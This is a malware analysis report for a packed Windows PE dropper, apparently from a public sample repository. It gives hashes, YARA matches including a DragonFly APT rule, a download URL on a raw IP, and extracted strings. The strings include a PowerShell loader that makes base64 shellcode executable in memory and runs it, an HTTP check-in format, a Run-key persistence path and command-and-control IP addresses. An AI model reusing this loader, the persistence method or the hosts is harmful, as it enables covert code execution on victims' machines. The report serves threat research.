Sample details: c042511df4ce1f0305fb0cb1b84780a9 --

Hashes
MD5: c042511df4ce1f0305fb0cb1b84780a9
SHA1: 3095111f886fb02656ba8d02b5823ebfe98234d0
SHA256: c831f7db89b27c0b0fdbc47e106eebbd041a413589e1b4d7ac85b769382e6285
SSDEEP: 384:VQTLexvisKcTlJvnzlXI2P2YNoGP5PW+qxHGmBK6gbqinjYp:GTav5lpzlY2/RPxqdGn6gbqu
Details
File Type: PE32
Added: 2018-03-07 02:52:46
Yara Hits
YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasOverlay | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/System_Tools | YRP/Antivirus | YRP/Dropper_Strings | YRP/network_dropper | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/suspicious_packer_section | FlorianRoth/DragonFly_APT_Sep17_3 |
Source
http://94.130.104.170/unpacked_dropper.ex_
Strings
		!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
SVWj<_W3
D$$PSS
PVhP1@
PVVVVVVV
hjkXjef
D$,d;@
D$,x;@
D$$H>@
D$ PSh?
D$ PSh?
D$XPh?
D$dPSSSSSSh
D$ _^[
%s %s HTTP/1.0
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %u
IsWow64Process
kernel32
Wow64DisableWow64FsRedirection
%1d.%1d.%04d_%1d.%1d
%x%x%x%x%x%x
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
%[^,],
type=%s&version=1.0&aid=%s&builddate=%s&id=%s&os=%s_%s
http://%s/q
software\microsoft\net framework setup\ndp\v2.0.50727
%windir%\system32\windowspowershell\v1.0\powershell.exe
function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("MyDelegateType","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split("\\")[-1].Equals("System.dll")};$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String("{ps_shellcode}");[Uint32[]] $op=0;([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga kernel32.dll VirtualProtect),(gd @([Byte[]],[UInt32],[UInt32],[UInt32[]]) ([IntPtr])))).Invoke($p,{ps_shellcode_length},0x40,$op);([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ga user32.dll CallWindowProcA),(gd @([Byte[]],[Byte[]],[UInt32],[UInt32],[UInt32]) ([IntPtr])))).Invoke($p,$p,0,0,0);
{ps_code_var1}
{ps_code_var2}
{ps_code_var3}
{ps_code_var4}
{ps_code_var5}
{ps_shellcode}
{ps_shellcode_length}
error_%u_%x_%x
software\microsoft\windows\currentversion\run
%[^;];%[^;];%[^;];%[^;];%s
install
CloseHandle
GetProcAddress
GetLastError
VirtualAlloc
VirtualFree
GetModuleHandleA
GetVersionExA
GetTickCount
CopyFileA
CreateProcessA
DeleteFileA
MoveFileExA
ExpandEnvironmentStringsA
GetTempPathW
CopyFileW
WaitForSingleObject
DeleteFileW
ExpandEnvironmentStringsW
CreateProcessW
GetExitCodeProcess
OpenEventA
GetModuleFileNameA
ExitProcess
KERNEL32.dll
RtlAdjustPrivilege
_vsnprintf
_snprintf
RtlRandom
sscanf
strncpy
strncat
_snwprintf
ZwSetValueKey
ZwCreateKey
strstr
ntdll.dll
WS2_32.dll
StrStrIA
SHGetValueA
PathFileExistsA
PathAppendW
PathFindFileNameW
SHLWAPI.dll
URLDownloadToCacheFileW
urlmon.dll
UuidCreateSequential
RPCRT4.dll
InternetCrackUrlA
WININET.dll
OpenProcessToken
GetTokenInformation
RegOpenKeyExA
RegSetKeySecurity
RegCloseKey
GetSidSubAuthority
GetSidSubAuthorityCount
RegCreateKeyExA
RegSetValueExW
RegFlushKey
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
OleInitialize
CoCreateInstance
ole32.dll
OLEAUT32.dll
memset
_chkstk
060414;8;178.89.159.34,178.89.159.35;1
!Win32 .DLL.
.MPRESS1
.MPRESS2
v2.19+#Q 
aeg@4$
OGBBq\@R
808L@0
~9h`M*0bL
WIW$PA
,stu5u
 SSSQ3
uC*	0B
Psj<_Z
UH	$PSSD
_gN,.21
ntdll@.
QuerAy<[W
PathUn
quoteSpa
CmpNI$#
RPCRT4
heckSumM
appe1!
USERENV
Temp-p@
Count0aU
Errorit	0A
ER#eg5\ExW8
#yl<U#Q
HTTP/1.0
Host:H0
Type: V!
ww-form-
urlenc2
|Length]
IsWow64~
tware\cl
alserv0er
02B4-09C
A-4bb6-B
78D-A8F5
9079A8D5
M`micrIo4
&H!tmp
S2g2 V
%s %s HTTP/1.0
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %u
_beginthreadex
msvcrt.dll
IsWow64Process
kernel32
%1d.%1d.
GetModuleHandleA
GetProcAddress
KERNEL32.DLL
ntdll.dll
WS2_32.dll
SHLWAPI.dll
StrStrA
WININET.dll
InternetCrackUrlA
RPCRT4.dll
UuidCreateSequential
imagehlp.dll
CheckSumMappedFile
USERENV.dll
CreateEnvironmentBlock
ADVAPI32.dll
RegCloseKey
ole32.dll
CoInitialize
t7Kt'Kt
050@0u0
2.2I2b2u2{2
353E3]3g3z3
394N4 5-5
6%676[6
7,7>7F:N:S:Y:^:
;8;d;m;{;
<!<0<5<H<n<
<2=M=T=^=g=
>/>=>K>b>
?8?>?L?c?i?p?
0$0?0P0X0e0m0s0x0
232A2O2U2g2l2v2{2
3!3&32373<3A3F3L3d3j3o3
4,42494>4[4s4z4